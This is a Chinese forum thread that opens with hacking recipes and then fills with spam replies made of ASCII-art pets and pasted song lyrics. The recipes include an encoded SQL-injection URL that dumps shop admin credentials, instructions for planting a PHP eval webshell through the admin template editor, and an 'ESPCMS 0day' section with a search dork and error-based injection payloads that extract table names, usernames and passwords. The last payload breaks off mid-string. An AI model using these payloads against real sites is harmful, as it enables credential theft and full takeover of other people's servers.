变种代码:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
直接在网站后台加入代码回车就能爆出帐号密码,再去掉代码加上/admin回车就能直接进后台了。
拿shell方法很简单,找到“库项目管理”再选择“配送的方式”,在代码最下面插入php一句话木马:<?php eval($_POST[x]);?> 不行就换php木马的预代码!
接着保存,一句话路径是:http://www.xxx.org/myship.php ; 打开“ASP+PHP两用Shell.html”填入地址,点击一下环境变量,成功之后点击上传文件就可以拿shell了。
=============================================================================================================================================================
【 ESPCMS通杀0day 】
关键字:inurl:index.php?ac=article&at=read&did=
默认后台:adminsoft/index.php 或者 admin/
注入点(爆表前缀,比如:cm_admin......前缀就是cm,后面3个代码要自行替换):
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密码:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((sele
39楼
发点福利 想学网络安全的可以看看
上帝的骑宠,上古时期世界的霸主。
┏┛┻━━━┛┻┓
┃|||||||┃
┃ ━ ┃
┃ ┳┛ ┗┳ ┃
┃ ┃
┃ ┻ ┃
┃ ┃
┗━┓ ┏━┛
┃ 史 ┃
┃ 诗 ┃
┃ 之 ┃
┃ 宠 ┃
┃ ┗━━━┓
┃经验与我同在 ┣┓
┃攻楼专用宠物 ┃
┗┓┓┏━┳┓┏┛
┃┫┫ ┃┫┫
┗┻┛ ┗┻┛
要不是3倍经验,我也不会带着我宝贵的宠物来。
┏┛┻━━━┛┻┓
┃|||||||┃
┃ ━ ┃
┃ ┳┛ ┗┳ ┃
┃ ┃
┃ ┻ ┃
┃ ┃
┗━┓ ┏━┛
┃ 史 ┃
┃ 诗 ┃
┃ 之 ┃
┃ 宠 ┃
┃ ┗━━━┓
┃经验与我同在 ┣┓
┃攻楼专用宠物 ┃
┗┓┓┏━┳┓┏┛
┃┫┫ ┃┫┫
┗┻┛ ┗┻┛
要不是3倍经验,我也不会带着我宝贵的宠物来。
头像神马的最赞了
他们都说**浮夸,我也也不知道是什么意思,我只是一个跟风党
困
____有些人在想一个人,有些人在等一个人,有些人敏感的心拒绝任何人,或者说,一切都是习惯了,我已经分不清,我们之间的所有一切是爱情还是友情。 ______♂___________♥__________♀______《贴吧水贴男神》
____有些人在想一个人,有些人在等一个人,有些人敏感的心拒绝任何人,或者说,一切都是习惯了,我已经分不清,我们之间的所有一切是爱情还是友情。 ______♂___________♥__________♀______《贴吧水贴男神》
神马东东✎﹍﹍﹍﹍﹍﹍﹍﹍﹍﹍﹍﹍﹍﹍﹍﹍﹍ 预备…唱!:别等到一千年以后,曹操对我说,童话里都是骗人的,我不可能是你的猴哥,猴哥你真了不得,五行大山压不住你,蹦出个葫芦娃,葫芦娃,一棵藤上七个瓜,风吹雨打都不怕,啊~啊,啊啊啊黑猫警长,登登登,登登登登登登登(吼叫)
黑客知识 渗透提权
